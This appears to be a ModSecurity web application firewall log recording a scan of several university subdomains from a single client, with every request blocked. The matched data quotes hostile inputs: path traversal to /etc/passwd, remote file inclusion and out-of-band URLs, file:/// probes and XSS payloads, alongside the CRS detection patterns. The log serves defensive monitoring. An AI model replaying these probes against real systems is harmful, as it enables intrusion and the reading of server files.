[Tue Aug 29 11:56:45.681549 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:970630/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/ueditor/php/controller.php"] [unique_id "ZO16jcCo-f0AAAoz8N8AAAAS"]
[Tue Aug 29 11:56:45.695801 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/redirect-to"] [unique_id "ZO16jcCo-f0AAAq-Hf8AAAAT"]
[Tue Aug 29 11:56:46.562308 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:394773/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/ueditor/jsp/controller.jsp"] [unique_id "ZO16jsCo-f0AAApbUy4AAAAh"]
[Tue Aug 29 11:56:46.562527 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:621066/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/ueditor/jsp/controller.jsp"] [unique_id "ZO16jsCo-f0AAAq5@VUAAAAK"]
[Tue Aug 29 11:56:46.625900 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:URLPARAMETER. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:URLPARAMETER: file:///"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/reports/rwservlet"] [unique_id "ZO16jsCo-f0AAApbUzAAAAAh"]
[Tue Aug 29 11:56:46.647907 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:URLPARAMETER. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:URLPARAMETER: file:///"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/reports/rwservlet"] [unique_id "ZO16jsCo-f0AAArZP0wAAAAC"]
[Tue Aug 29 11:56:46.668944 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:367691/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ueditor/jsp/controller.jsp"] [unique_id "ZO16jsCo-f0AAArZP00AAAAC"]
[Tue Aug 29 11:56:46.711760 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:553262/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/ueditor/jsp/controller.jsp"] [unique_id "ZO16jsCo-f0AAAolK50AAAAe"]
[Tue Aug 29 11:56:46.786719 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:URLPARAMETER. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:URLPARAMETER: file:///"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/reports/rwservlet"] [unique_id "ZO16jsCo-f0AAAq5@V0AAAAK"]
[Tue Aug 29 11:56:46.796875 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:URLPARAMETER. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:URLPARAMETER: file:///"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/reports/rwservlet"] [unique_id "ZO16jsCo-f0AAArIAZIAAAAX"]
[Tue Aug 29 11:56:46.925118 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:231591/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/ueditor/jsp/controller.jsp"] [unique_id "ZO16jsCo-f0AAApbUzsAAAAh"]
[Tue Aug 29 11:56:47.537518 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:URLPARAMETER. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:URLPARAMETER: file:///"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/reports/rwservlet"] [unique_id "ZO16j8Co-f0AAAocyoQAAAAR"]
[Tue Aug 29 11:56:47.540354 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/scripts/wa.exe"] [unique_id "ZO16j8Co-f0AAAq-HgMAAAAT"]
[Tue Aug 29 11:56:47.543855 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/components/com_ionfiles/download.php"] [unique_id "ZO16j8Co-f0AAApbUz4AAAAh"]
[Tue Aug 29 11:56:47.548277 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/scripts/wa.exe"] [unique_id "ZO16j8Co-f0AAArIAZgAAAAX"]
[Tue Aug 29 11:56:47.552132 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/scripts/wa.exe"] [unique_id "ZO16j8Co-f0AAArZP1oAAAAC"]
[Tue Aug 29 11:56:47.605684 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/scripts/wa.exe"] [unique_id "ZO16j8Co-f0AAAolK6kAAAAe"]
[Tue Aug 29 11:56:47.606385 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:528109/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/ueditor/php/controller.php"] [unique_id "ZO16j8Co-f0AAAq5@WAAAAAK"]
[Tue Aug 29 11:56:47.609680 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/scripts/wa.exe"] [unique_id "ZO16j8Co-f0AAArIAZkAAAAX"]
[Tue Aug 29 11:56:47.609809 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/components/com_ionfiles/download.php"] [unique_id "ZO16j8Co-f0AAAq-HgQAAAAT"]
[Tue Aug 29 11:56:47.620316 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/components/com_ionfiles/download.php"] [unique_id "ZO16j8Co-f0AAApbU0AAAAAh"]
[Tue Aug 29 11:56:47.628553 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/components/com_ionfiles/download.php"] [unique_id "ZO16j8Co-f0AAAoz8OYAAAAS"]
[Tue Aug 29 11:56:47.628766 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/components/com_ionfiles/download.php"] [unique_id "ZO16j8Co-f0AAAocyocAAAAR"]
[Tue Aug 29 11:56:48.571303 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:at. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:at: <svg onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/dokuwiki/doku.php"] [unique_id "ZO16kMCo-f0AAAoz8OkAAAAS"]
[Tue Aug 29 11:56:48.594764 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/scripts/wa-HAP.exe"] [unique_id "ZO16kMCo-f0AAArZP2AAAAAC"]
[Tue Aug 29 11:56:48.594804 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:at. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onload= found within ARGS:at: <svg onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/dokuwiki/doku.php"] [unique_id "ZO16kMCo-f0AAAqsWB8AAAAB"]
[Tue Aug 29 11:56:48.645361 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:at. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onload= found within ARGS:at: <svg onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/dokuwiki/doku.php"] [unique_id "ZO16kMCo-f0AAAq-HgoAAAAT"]
[Tue Aug 29 11:56:48.672525 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/scripts/wa-HAP.exe"] [unique_id "ZO16kMCo-f0AAAq-HgsAAAAT"]
[Tue Aug 29 11:56:48.679529 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:at. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:at: <svg onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/dokuwiki/doku.php"] [unique_id "ZO16kMCo-f0AAArIAaAAAAAX"]
[Tue Aug 29 11:56:48.698057 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:at. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onload= found within ARGS:at: <svg onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/dokuwiki/doku.php"] [unique_id "ZO16kMCo-f0AAAocyo4AAAAR"]
[Tue Aug 29 11:56:48.699520 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver 